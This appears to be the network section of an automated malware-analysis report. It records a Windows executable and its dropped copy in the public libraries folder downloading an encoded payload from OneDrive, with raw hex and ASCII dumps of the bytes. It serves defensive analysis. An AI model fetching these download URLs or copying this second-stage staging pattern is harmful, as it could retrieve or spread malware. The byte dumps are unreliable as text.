                                                                                                                                        Location: https://2q5ira.ph.files.1drv.com/y4mH5njK3Y1QtIbimJzFbCrE_JDXEnExbjbVxBDZIFjebXmw79EaJlBUAJQg8a2lSk0jKy-tPU0chMYqSM0jXi-8cGNjx2a1GBrDjquvitMbc8eWJHco5I2rBTPI-ScXgjnnudSH65QTD1_9Msg8MkBuR4z6AMBXpFPY3dC7-t0HPCsGu7SJi2G7CfkzInKuP5-ICh-FkN7O4Kfuxs8jByCVg/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1
                                                                                                                                        Set-Cookie: E=P:BF1MgWl52og=:F+xq8Gts1vRy7++nYQKKT1+BcfBw1F8nnh1g/tKvTnE=:F; domain=.live.com; path=/
                                                                                                                                        Set-Cookie: xid=bd1d4f9d-8eae-45b4-81c8-541862284c86&&RD00155D99AC6F&264; domain=.live.com; path=/
                                                                                                                                        Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                        Set-Cookie: LD=; domain=.live.com; expires=Mon, 08-Aug-2022 16:32:07 GMT; path=/
                                                                                                                                        Set-Cookie: wla42=; domain=live.com; expires=Mon, 15-Aug-2022 18:12:07 GMT; path=/
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        X-MSNServer: RD00155D99AC6F
                                                                                                                                        X-ODWebServer: eastus1-odwebpl
                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                        X-MSEdge-Ref: Ref A: 8F105B9B80CB4A57B880E6EC8CF60156 Ref B: VIEEDGE2220 Ref C: 2022-08-08T18:12:07Z
                                                                                                                                        Date: Mon, 08 Aug 2022 18:12:07 GMT
                                                                                                                                        Connection: close
                                                                                                                                        Content-Length: 0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        1192.168.2.34973713.107.43.13443C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        2022-08-08 18:12:08 UTC1OUTGET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1
                                                                                                                                        User-Agent:
                                                                                                                                        Host: onedrive.live.com
                                                                                                                                        Cookie: E=P:BF1MgWl52og=:F+xq8Gts1vRy7++nYQKKT1+BcfBw1F8nnh1g/tKvTnE=:F; xid=bd1d4f9d-8eae-45b4-81c8-541862284c86&&RD00155D99AC6F&264; xidseq=1; wla42=
                                                                                                                                        2022-08-08 18:12:09 UTC1INHTTP/1.1 302 Found
                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Expires: -1
                                                                                                                                        Location: https://2q5ira.ph.files.1drv.com/y4m2hcEcRyV2JhQQBZaqRIjzQw6g-TKpbJPNuPamP3d_ftn7KVVKB28wfCFbzizb3EScW4XZrjxDHVU2nlolu0KT6p2C5WkCpqMaIKZEKYwJ0K8_25tYVzGHqkoOILcSjWIrc9QmBIPZzNFMIOwUZGN1um-6-LbSlR6g_5dmytuWc52jf4STIO2D4ciaxKqk4X3i3LdPJKMJbYct39TynP62g/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1
                                                                                                                                        Set-Cookie: E=P:Ue8Sgml52og=:2CbmHhTEK6PNZmJKCqUp84cYqU1uNUkruQuHtUevA0c=:F; domain=.live.com; path=/
                                                                                                                                        Set-Cookie: xidseq=2; domain=.live.com; path=/
                                                                                                                                        Set-Cookie: LD=; domain=.live.com; expires=Mon, 08-Aug-2022 16:32:08 GMT; path=/
                                                                                                                                        Set-Cookie: wla42=; domain=live.com; expires=Mon, 15-Aug-2022 18:12:09 GMT; path=/
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        X-MSNServer: RD00155D5E899F
                                                                                                                                        X-ODWebServer: canadaeast0-odwebpl
                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                        X-MSEdge-Ref: Ref A: 8B9493EEB3144B558088DD3320DF0EC7 Ref B: VIEEDGE2913 Ref C: 2022-08-08T18:12:08Z
                                                                                                                                        Date: Mon, 08 Aug 2022 18:12:08 GMT
                                                                                                                                        Connection: close
                                                                                                                                        Content-Length: 0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        2192.168.2.34974613.107.43.12443C:\Users\Public\Libraries\Jwjxmakrv.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        2022-08-08 18:12:29 UTC2OUTGET /y4mtTOeeswFZvEvWO7PkDWtzJAdem80ecf7E9nGL_Zv4nrGYw4XHqnwQKr6FduyLWzPibKAFYV0xjQdV9_Sbrn3WQnCWQVi51NO3WbiwMfOxjZCKscbz07KqgJxS1eQqwWI1nY5Nm6kgY9vMOzq0OAhg_-tnzDbDTvoJ8m9VvdOhZc335o19UrBupw81DRG4jFsQqG8OamsctZsRjc20RRa-w/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1 HTTP/1.1
                                                                                                                                        User-Agent: lVali
                                                                                                                                        Host: 2q5ira.ph.files.1drv.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        2022-08-08 18:12:29 UTC2INHTTP/1.1 200 OK
                                                                                                                                        Cache-Control: public
                                                                                                                                        Content-Length: 176597
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        Content-Location: https://2q5ira.ph.files.1drv.com/y4mt_L56XfeV5AxASyoyGlTAONQRp7vzWLKSJ-3QlK1MqAbhWXL60OiqtjrBe3gN1xBoD_r1DEwQOnzL8alhWdzoV4dXTbQnAPBlGdisOZ40oBFXSHtnmRSXHNJEkWa40KHBIN5wJovWCBSCOoWJ36AFQtwVXuVnLiElslGy8b4QEVXKeyDO-kSqSIBYurExcgo
                                                                                                                                        Expires: Sun, 06 Nov 2022 18:12:29 GMT
                                                                                                                                        Last-Modified: Sun, 07 Aug 2022 23:08:30 GMT
                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                        ETag: E0CF7F9E6AAF27EF!235.2
                                                                                                                                        P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                        X-MSNSERVER: PH2PPF565EA4797
                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                        MS-CV: b4RE8hOGWU2mJZDv2ER/Uw.0
                                                                                                                                        X-SqlDataOrigin: S
                                                                                                                                        CTag: aYzpFMENGN0Y5RTZBQUYyN0VGITIzNS4yNTc
                                                                                                                                        X-PreAuthInfo: rv;poba;
                                                                                                                                        Content-Disposition: attachment; filename="Jwjxmakrvkwfuijrnbpqlslhsyeopao"
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        X-StreamOrigin: X
                                                                                                                                        X-AsmVersion: UNKNOWN; 19.966.720.2006
                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                        X-MSEdge-Ref: Ref A: 21FDDC2B2D9B44A58900E0EFD1C951D0 Ref B: VIEEDGE1416 Ref C: 2022-08-08T18:12:29Z
                                                                                                                                        Date: Mon, 08 Aug 2022 18:12:29 GMT
                                                                                                                                        Connection: close
                                                                                                                                        2022-08-08 18:12:29 UTC4INData Raw: 63 61 f0 ec 79 fc 20 8d e8 79 ea 0e 26 26 8d 79 ea 5d ec 97 5f 63 61 f0 26 26 ea 79 5d ea fc fe 5d ea e8 79 36 b1 a9 b1 9f 3e 9f 3e 28 a9 3c 2c 3a a1 2a ab b3 2a 38 a3 9d b3 9f a9 36 ad b3 a9 a9 a1 2c 40 3a 32 28 b1 a9 2e 3e 40 9f 9d ad a7 a9 af b3 a3 3c 32 ab a9 a5 36 ad 38 3e 40 3e 32 ab af a7 a1 2c 40 32 a9 2e b1 b3 30 9d 63 61 f0 ec 79 fc 20 8d e8 79 ea 0e 26 26 8d 79 ea 5d ec 97 5f 63 61 f0 26 26 ea 79 5d ea fc fe 5d ea e8 79 83 3e a3 b1 34 28 32 ab af 32 3e 9f 3c 30 a3 ab a7 9b a9 38 a5 3a a5 a1 3a 40 2c 36 a9 28 36 63 61 f0 ec 79 fc 20 8d e8 79 ea 0e 26 26 8d 79 ea 5d ec 97 5f 63 61 f0 26 26 ea 79 5d ea fc fe 5d ea e8 79 5a bd c5 bd d3 52 d3 52 64 c5 50 60 56 cd 66 c7 bf 66 54 cf d1 bf d3 c5 5a c1 bf c5 c5 cd 60 4c 56 5e 64 bd c5 62 52 4c d3 d1 c1
                                                                                                                                        Data Ascii: cay y&&y]_ca&&y]]y6>>(<,:**86,@:2(.>@<268>@>2,@2.0cay y&&y]_ca&&y]]y>4(22><08::@,6(6cay y&&y]_ca&&y]]yZRRdP`VffTZ`LV^dbRL
                                                                                                                                        2022-08-08 18:12:29 UTC5INData Raw: 6d de 15 18 d3 66 2a 25 ed c1 b5 9a 33 db 36 a3 c9 dc 0d b3 6b 14 8a c3 cc 48 31 fa 34 9b ba 1f 3a b5 11 03 73 b3 27 e7 96 3c 63 5f 7c 43 c9 f8 68 d3 c9 58 ea d8 50 6a 0e 3c c2 84 85 ae 98 7a f2 64 8d eb 2d cc 6d 24 8f e0 cc f4 8f af 32 6b d8 3e bb 99 9d 96 93 a5 7f 92 0e 45 64 e6 9e 3f d9 25 8f 11 70 6a 80 45 c2 63 e7 bc 45 c5 0a 42 11 c2 fb 65 fd a3 36 ec 1b 59 99 21 30 81 e9 a2 c7 81 1a fa 80 0d 0b 11 26 51 1c 2a 22 b5 51 42 cf 84 10 34 11 a4 3a 68 40 ab 1a a3 b9 3e 8e 3c e1 1c e1 5b 2c 50 b9 53 da 21 6c e3 58 be 68 8b 8d f4 9a ba 12 67 81 3b 59 d0 1e e6 ab 2c be 6a 8d 6f 11 a3 79 c7 43 99 d0 fb 17 c4 64 d9 ac 4f ce 02 6e 4b 8a d8 e6 53 ef 5e b9 85 8b d8 38 a5 e1 53 b0 ef e6 95 4f ce dd 30 4f 6a 83 5e 20 05 a1 36 8c 2a af d2 4d 5a 87 b0 76 30 ff 4d b2
                                                                                                                                        Data Ascii: mf*%36kH14:s'<c_|ChXPj<zd-m$2k>Ed?%pjEcEBe6Y!0&Q*"QB4:h@><[,PS!lXhg;Y,joyCdOnKS^8SO0Oj^ 6*MZv0M
                                                                                                                                        2022-08-08 18:12:29 UTC13INData Raw: d2 bf 98 08 82 b6 0c d0 a7 a7 b3 b3 e4 54 7c 5f e7 57 a8 ce 84 2c b8 b3 97 e2 b2 31 98 51 9c 2e bf 0f 21 1b cc 95 a2 d8 fb 04 10 a4 a0 57 2f 62 d9 bd fc 21 a2 f9 2a de c1 2e ce d4 d0 c3 0b a5 cd a4 82 11 18 23 88 fd a8 1c b0 15 d7 b1 21 4d f6 07 7a 82 cb eb a9 db 91 19 a9 da 8c 3d 3a 9d 7a 83 40 24 8e 5e d9 7c e5 08 fd 8d 3c af 83 5c 9e dd e3 3f 99 30 7c d1 f3 7d 20 5f 3c 69 aa e9 b2 b4 30 c2 7b 4d 93 50 a2 79 b3 38 bc d9 2f 6c 33 f3 f3 8b 72 d5 b5 06 95 5a f0 80 80 be da 60 0f e8 92 ae 95 33 03 fd 3d 9d 3a ca 99 10 0f cd e9 1a 17 44 64 57 2b ec 34 eb 66 5b cc 7e c2 7b fa e7 3d 7a 13 08 b5 34 71 2a a5 2e b5 0e 3a 81 d5 b6 83 99 1f 79 5c e0 9d 08 4d 5d 72 44 e7 a6 90 52 08 67 b4 a5 1d fd 52 03 52 44 1c 39 ae 4c a8 35 c5 1b e4 80 23 0c ae be 4a 2d 3e 10 19
                                                                                                                                        Data Ascii: T|_W,1Q.!W/b!*.#!Mz=:z@$^|<\?0|} _<i0{MPy8/l3rZ`3=:DdW+4f[~{=z4q*.:y\M]rDRgRRD9L5#J->
                                                                                                                                        2022-08-08 18:12:29 UTC21INData Raw: 59 b3 01 ad 6d 0a e0 51 3b b9 7d 5b 53 40 4f 0c ea c9 ed 27 01 f3 dc 79 2a fe 28 1d 0d 8c 4b a6 d9 db 84 33 fb 31 78 67 a7 b7 39 2f ea 92 1b bc 18 02 0c b9 d3 9d 0b ec 2f 09 cc 67 04 33 69 06 db c8 8a 61 85 23 98 d6 92 58 4e 98 8c 81 d8 90 f9 ee 28 ed 9a 5d 83 8b 9d 8a cd 93 50 4e 1b 07 04 a2 07 8c f4 6d 6b d6 ad ea 54 e2 41 6f d2 7b 2a 46 63 2e d4 c8 3d 69 60 52 0a 71 85 be 9e 81 26 3a aa 75 15 73 87 4a 1c 01 5e 4e 3b af 83 67 c2 94 02 01 7a 74 41 24 ea 75 c2 99 b9 58 4d 7a 6e bf 2c 4a 0d 06 06 f5 ab 00 52 c6 e8 0e 3a 56 27 1d 74 37 18 b2 54 c3 77 cb 52 c7 39 74 a1 d8 a4 a6 e8 5b e5 7f 4c 5f 90 f3 c9 38 ca 64 8f 22 f4 b2 01 04 6e af d8 57 e0 17 4b 8a cd bb 07 61 e7 b7 7a 0d 2d a8 17 30 e9 f9 c2 9e 53 c1 50 49 a5 79 3e b8 dd 82 c9 45 47 c3 86 66 f5 96 15
                                                                                                                                        Data Ascii: YmQ;}[S@O'y*(K31xg9//g3ia#XN(]PNmkTAo{*Fc.=i`Rq&:usJ^N;gztA$uXMzn,JR:V't7TwR9t[L_8d"nWKaz-0SPIy>EGf


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        3192.168.2.34974813.107.43.12443C:\Users\Public\Libraries\Jwjxmakrv.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        2022-08-08 18:12:30 UTC29OUTGET /y4mPPeb9DbMgUpTw8rgi0z9dh_H8HrzfYIqodVmKxsKtJmWk00zgJ3zu481-zwoTvTa0cxGRrCYES6g2a0zaTIakDGUvozKOJciyD6JCpNiyjHZcmfPyDooT0h1JU_O8sSkgYGocwmlALM_59Ui23ibnwkt9D4viRLcZLL1t6g8vn3_wThdv1B88C73FcDGQ4N13iZgpf-DIJjM28kjlru3Pg/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1 HTTP/1.1
                                                                                                                                        User-Agent:
                                                                                                                                        Host: 2q5ira.ph.files.1drv.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        2022-08-08 18:12:31 UTC29INHTTP/1.1 200 OK
                                                                                                                                        Cache-Control: public
                                                                                                                                        Content-Length: 176597
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        Content-Location: https://2q5ira.ph.files.1drv.com/y4mt_L56XfeV5AxASyoyGlTAONQRp7vzWLKSJ-3QlK1MqAbhWXL60OiqtjrBe3gN1xBoD_r1DEwQOnzL8alhWdzoV4dXTbQnAPBlGdisOZ40oBFXSHtnmRSXHNJEkWa40KHBIN5wJovWCBSCOoWJ36AFQtwVXuVnLiElslGy8b4QEVXKeyDO-kSqSIBYurExcgo
                                                                                                                                        Expires: Sun, 06 Nov 2022 18:12:30 GMT
                                                                                                                                        Last-Modified: Sun, 07 Aug 2022 23:08:30 GMT
                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                        ETag: E0CF7F9E6AAF27EF!235.2
                                                                                                                                        P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                        X-MSNSERVER: PH2PPF15A64ABD6
                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                        MS-CV: dfBygyJ9i06G5jgO8XruCA.0
                                                                                                                                        X-SqlDataOrigin: S
                                                                                                                                        CTag: aYzpFMENGN0Y5RTZBQUYyN0VGITIzNS4yNTc
                                                                                                                                        X-PreAuthInfo: rv;poba;
                                                                                                                                        Content-Disposition: attachment; filename="Jwjxmakrvkwfuijrnbpqlslhsyeopao"
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        X-StreamOrigin: X
                                                                                                                                        X-AsmVersion: UNKNOWN; 19.966.720.2006
                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                        X-MSEdge-Ref: Ref A: 66AFC2CCFCA2402593ADA0EF4868C722 Ref B: VIEEDGE3016 Ref C: 2022-08-08T18:12:30Z
                                                                                                                                        Date: Mon, 08 Aug 2022 18:12:30 GMT
                                                                                                                                        Connection: close
                                                                                                                                        2022-08-08 18:12:31 UTC30INData Raw: 63 61 f0 ec 79 fc 20 8d e8 79 ea 0e 26 26 8d 79 ea 5d ec 97 5f 63 61 f0 26 26 ea 79 5d ea fc fe 5d ea e8 79 36 b1 a9 b1 9f 3e 9f 3e 28 a9 3c 2c 3a a1 2a ab b3 2a 38 a3 9d b3 9f a9 36 ad b3 a9 a9 a1 2c 40 3a 32 28 b1 a9 2e 3e 40 9f 9d ad a7 a9 af b3 a3 3c 32 ab a9 a5 36 ad 38 3e 40 3e 32 ab af a7 a1 2c 40 32 a9 2e b1 b3 30 9d 63 61 f0 ec 79 fc 20 8d e8 79 ea 0e 26 26 8d 79 ea 5d ec 97 5f 63 61 f0 26 26 ea 79 5d ea fc fe 5d ea e8 79 83 3e a3 b1 34 28 32 ab af 32 3e 9f 3c 30 a3 ab a7 9b a9 38 a5 3a a5 a1 3a 40 2c 36 a9 28 36 63 61 f0 ec 79 fc 20 8d e8 79 ea 0e 26 26 8d 79 ea 5d ec 97 5f 63 61 f0 26 26 ea 79 5d ea fc fe 5d ea e8 79 5a bd c5 bd d3 52 d3 52 64 c5 50 60 56 cd 66 c7 bf 66 54 cf d1 bf d3 c5 5a c1 bf c5 c5 cd 60 4c 56 5e 64 bd c5 62 52 4c d3 d1 c1
                                                                                                                                        Data Ascii: cay y&&y]_ca&&y]]y6>>(<,:**86,@:2(.>@<268>@>2,@2.0cay y&&y]_ca&&y]]y>4(22><08::@,6(6cay y&&y]_ca&&y]]yZRRdP`VffTZ`LV^dbRL
                                                                                                                                        2022-08-08 18:12:31 UTC34INData Raw: 36 e7 01 ac 10 02 72 1e 00 37 eb 8b 38 20 bc ee 4f 16 3f c5 d1 6a fd 38 e8 e5 9a c2 ab 56 39 1c 0c 10 75 87 d3 b0 49 76 9a 9f 91 13 bd f4 2f bb e9 45 0d 71 83 4e 1c 7c 9b c3 5f e0 fd 56 79 a8 74 52 c0 d6 55 9c 92 9b 28 ee 5e c0 ff 2d 0d 60 40 4e 63 1c 73 c7 ab 7a f2 fd 52 78 80 dd 07 80 fc 27 7c c8 34 34 49 79 7b c0 4f fa 49 2c 4b 2c f1 11 60 62 fe 06 00 bc fc 7e b8 3f ce 01 0e 34 d1 d0 c7 dd 59 9d 60 6e 45 9d 84 95 1c d6 f2 65 c7 11 f2 c2 73 5e 5d b3 7a 18 ae 03 63 39 4b ad 28 7f ff 46 9d e2 8f 86 93 72 6f d0 77 14 9b 27 c3 0e dc 43 82 9f ba 0f 7b 66 e3 8f bf a3 ea a2 1d 21 94 1b ad a4 91 e1 93 e6 43 e2 ce 34 89 81 78 6f 1f d9 34 2b f1 ce 5c 51 ff e9 8f fe a3 45 a6 50 0c 0f 5f 49 cd 0e ea 09 4f 10 73 9d 91 f4 b1 4b aa 9a fe cf dc 21 3c a4 9e a0 8a 1a d7
                                                                                                                                        Data Ascii: 6r78 O?j8V9uIv/EqN|_VytRU(^-`@NcszRx'|44Iy{OI,K,`b~?4Y`nEes^]zc9K(Frow'C{f!C4xo4+\QEP_IOsK!<
                                                                                                                                        2022-08-08 18:12:31 UTC42INData Raw: d4 4a 54 8c 8f 66 71 e9 f9 d1 79 65 38 5f 05 6d a8 15 f7 a5 56 a1 1f 7e 45 bc 40 07 ae 7f 23 b6 68 0d 36 18 86 dd fb 10 16 fb 5a 6c 9d 0d e9 96 75 46 f2 f4 26 c8 4a 4a 3a 89 2f 15 2b 61 5a c7 24 7e 59 9e 38 c6 48 9a d5 c3 be 9d d8 9e a7 3a 19 28 52 c7 55 33 74 3e 74 83 73 ba ad 12 dc be be 6a be 45 50 f9 8f cb 0b 7e 99 90 7e dd f5 fa 91 3d bd 2b 43 97 b1 a3 45 8a 71 4d 34 84 60 58 db 59 9c 75 2e 32 f1 0c 57 7e 7b c5 96 6f 16 72 1e 96 2e fc 51 5d 4d 3a b1 43 25 1e 59 21 f3 36 40 19 6a a2 d7 d1 9e 10 d4 19 45 f5 19 7d 27 63 d6 89 69 6a 88 0e 05 10 c5 a0 43 96 91 63 9c d9 cb be 66 d7 4a 50 09 de 41 1c c6 de ea ca 4e 63 70 85 eb e9 ac 1f 53 98 34 72 93 f3 9f 5a b2 8e 74 c4 19 2a 01 35 36 2f 48 60 54 70 75 3a ee 80 49 23 39 14 43 56 cb 98 d2 d3 e7 a7 8d 76 78
                                                                                                                                        Data Ascii: JTfqye8_mV~E@#h6ZluF&JJ:/+aZ$~Y8H:(RU3t>tsjEP~~=+CEqM4`XYu.2W~{or.Q]M:C%Y!6@jE}'cijCcfJPANcpS4rZt*56/H`Tpu:I#9CVvx
                                                                                                                                        2022-08-08 18:12:31 UTC50INData Raw: 9f a1 93 ed 9a 20 f5 99 d7 8f 76 7c 42 d9 cd bc 1a 00 cc 22 ad da f3 28 22 0f f3 fc 85 6e 1c b0 83 c7 ad 26 8c 6e b2 74 51 34 ac 49 3a cd 3d 9c 12 67 cf 4d dd d0 e3 27 60 52 91 53 62 b5 30 56 b8 84 0f c2 7f 18 9d ec 64 73 16 d1 c9 61 d0 e4 c0 ea 0f 9a 0e 69 d5 4c 16 83 00 6a ab f1 e7 9e c0 c5 f4 e2 44 c7 1d 74 06 1c 84 ae ca f8 ad e7 fb 1a 03 a7 4e dc 9c 49 a8 6c 93 c7 9c f8 44 35 8c c1 54 17 1c 63 f8 7e b3 37 13 17 94 45 b9 88 01 0f 70 a1 85 eb 57 bc ba 54 d7 59 8c 29 16 0b e9 3e 3b b6 dc d7 bc b5 ff 1c ff 87 30 20 ff 98 12 e8 06 b7 4d b3 48 41 95 60 cd c9 2a 94 c0 3c c1 76 a1 5a fe ae 2a 56 63 fc 38 17 c0 9c d8 db 24 99 fd 84 6f 5b 9c 19 23 7b f4 5d 97 fe 03 86 df 06 c4 00 f6 7e 27 c4 4f 13 f7 e4 5a 64 eb aa b1 dc 36 a3 48 94 ce 88 8f 95 14 88 33 f7 6e
                                                                                                                                        Data Ascii: v|B"("n&ntQ4I:=gM'`RSb0VdsaiLjDtNIlD5Tc~7EpWTY)>;0 MHA`*<vZ*Vc8$o[#{]~'OZd6H3n
                                                                                                                                        2022-08-08 18:12:31 UTC58INData Raw: aa fd 29 40 57 b6 d5 76 ae 64 57 49 45 bf ca 8b cb 3e 4e 6b b0 e4 b2 bf ed d6 28 09 b7 46 9e 6b ee e9 40 5c 4c ca e2 4d c1 d2 dc bf 58 d1 e9 9a 87 c6 82 f6 de 02 6c 23 29 6b b3 0f b7 dd 56 f7 7a 7f 55 70 38 85 c1 0a 27 a4 4b f5 24 f9 9b 18 e1 57 e1 e0 8a cf 8a 78 9e 5b 9f 94 15 b5 78 de c0 e3 af c3 e9 69 b9 be 7a 9f 10 29 b6 d3 bb b8 0b d4 dc 46 59 5d 25 85 c9 84 4b 3f dc 9b de d3 f1 63 96 8e 1b 8b a6 b4 0c 2b 99 02 42 9d 66 52 7e 76 43 f8 63 52 6b 5c 41 b9 8a 75 fd dc a9 51 55 b9 d0 e7 11 44 57 a5 18 0a e3 05 f3 ec 28 0d 5c 3c 19 4a 13 c0 3b 42 2d 21 8e 0a 1b e0 cd 48 66 be 28 05 a1 6f b8 52 6d cb 67 06 1d c1 ae c9 55 46 bd 3f 7d 3f ad 8e 83 7e ef 44 60 9f 1e a4 7d d6 1b a4 dc d9 2b 45 e9 c8 17 a4 4a 15 b4 f0 0e 6c c0 1d 37 0f fc 77 3e b6 df cb 64 ba ab
                                                                                                                                        Data Ascii: )@WvdWIE>Nk(Fk@\LMXl#)kVzUp8'K$Wx[xiz)FY]%K?c+BfR~vCcRk\AuQUDW(\<J;B-!Hf(oRmgUF?}?~D`}+EJl7w>d
                                                                                                                                        2022-08-08 18:12:31 UTC66INData Raw: 7d f4 f1 2c 7d 68 e4 a6 d7 1f 54 92 d5 fd a1 7e 0e 71 0c 47 b7 f3 11 78 5f 82 80 04 69 34 fa a6 0b cc 62 f2 6d 63 32 92 71 6f 47 1a be 6c ca f2 d4 57 b2 aa 47 94 4a ad b0 d2 c1 e3 80 9f 9b dd d1 27 0d c1 65 43 bf 94 0f 5e 80 fd b3 d4 e8 fb d4 50 c0 64 62 2f 18 d6 9b 73 50 91 3a c3 7b 2a af 18 af 04 f9 08 5a 3c 8f 9f 6a 71 29 95 c8 01 20 d2 69 5e 7a b2 d4 f3 3a 61 10 64 8b 5b ea fe 87 22 43 3c 89 07 c1 47 f5 6f 69 ab 96 e0 1a 8c 17 ee 78 ba bb 9d 06 e3 06 c1 76 a1 84 76 30 ba 74 ca c5 6d 26 2e 07 07 71 62 4d d1 5b b6 f3 cd b4 36 e4 9d 77 67 a7 90 c9 7b 45 6e 1d 13 6c 10 90 0b 08 6a b4 fd 97 33 29 f2 69 0f af c1 ce 4a d0 b2 1d 04 67 01 8b 68 1b 6b 36 5a bf a8 74 22 c7 54 d1 4c 6b f5 42 a9 67 bf 15 89 c8 47 a1 2d 91 dc a0 25 40 bf 4f 25 e7 23 44 91 85 c7 5c
                                                                                                                                        Data Ascii: },}hT~qGx_i4bmc2qoGlWGJ'eC^Pdb/sP:{*Z<jq) i^z:ad["C<Goixvv0tm&.qbM[6wg{Enlj3)iJghk6Zt"TLkBgG-%@O%#D\
                                                                                                                                        2022-08-08 18:12:31 UTC74INData Raw: 97 ec 17 99 57 0a 16 e4 4c 7a 95 5f ff c2 72 9b 07 ff b9 ac 45 e9 be a4 72 c9 8d be 09 52 45 ba b8 5e a2 3f b2 ac 4e 70 76 fc 3e 4b 68 38 17 68 a5 9d 50 85 f6 96 b4 9c 97 50 a0 fe c4 8f 60 a4 45 6c 6d 9b a0 70 f9 f9 7d fd 10 af 15 5f 73 13 c9 a9 62 14 93 49 3b 31 39 b2 10 ef 4c a5 a8 13 e8 3c f4 49 18 b9 20 c8 1a c8 7d ae db 48 f0 9a 83 23 8b 81 02 75 16 29 b4 db 10 31 a1 41 da 9a ea db c4 78 a5 a5 72 56 be 76 70 55 8b fa 20 29 64 85 90 24 4a 46 e6 52 9a b8 c4 b0 7f 04 c5 ad 82 08 00 de 44 a7 5f 90 a0 9e 29 1b 14 cd 53 29 b5 d2 38 89 5d 1b 57 0e 30 00 9f 58 7a aa fb d5 14 88 f5 58 4b ef f8 26 78 2c 45 0b 0e aa d2 e8 09 c9 f2 2f f8 54 57 5d c1 7f c2 b8 a6 27 27 e1 11 54 3b 7f 12 db e3 15 fa d1 36 22 ba 48 16 02 35 db 5c e6 fc 6a 9b 37 19 c4 79 d1 12 63 12
                                                                                                                                        Data Ascii: WLz_rErRE^?Npv>Kh8hPP`Elmp}_sbI;19L<I }H#u)1AxrVvpU )d$JFRD_)S)8]W0XzXK&x,E/TW]''T;6"H5\j7yc
                                                                                                                                        2022-08-08 18:12:31 UTC82INData Raw: 5f 6b cf a5 ee 90 b8 75 c1 cf cf 48 49 1b 03 ed ad ec ee 9b 21 92 70 aa 1f 31 5e c5 6f cd 67 62 06 5d 49 0f 4c 62 5a c2 46 25 2a 09 af 0f d4 fa 25 01 31 3f 5e 60 d7 75 ca 1b 2a f8 a8 d8 1f d4 0c fa 52 24 9d 16 d6 81 7d 1c 35 b8 3f 67 97 99 41 16 29 6d bc 74 58 04 f8 2f bd c3 56 19 39 aa 8a 93 d3 5d ab bb ce 18 3f e8 ab 61 54 f6 17 5f 36 bd 27 9e cd 63 bc 71 b4 83 c0 37 c4 6b 4d af 85 9c c2 25 b6 f9 51 1e d1 bd 5e 53 49 bc 59 de a8 f7 c4 da 4d db 76 43 e1 cb 34 5b 10 54 58 52 a9 ce 33 43 69 7c fd 5f be 5c d1 64 42 ce 23 e5 a8 d5 98 2d 50 54 4c bb 22 4d 33 5d e3 7c 89 02 62 95 56 4e 4e 83 2a b0 1b f5 45 0c 33 5a 45 a1 52 29 54 29 b6 0c 7b e9 67 35 31 62 60 c9 e5 3f c2 89 12 6b cd 42 14 92 8e c2 7e 09 3a aa e3 5b f4 67 1e 53 6f 06 fb 25 67 4e cd b9 56 d2 c4
                                                                                                                                        Data Ascii: _kuHI!p1^ogb]ILbZF%*%1?^`u*R$}5?gA)mtX/V9]?aT_6'cq7kM%Q^SIYMvC4[TXR3Ci|_\dB#-PTL"M3]|bVNN*E3ZER)T){g51b`?kB~:[gSo%gNV
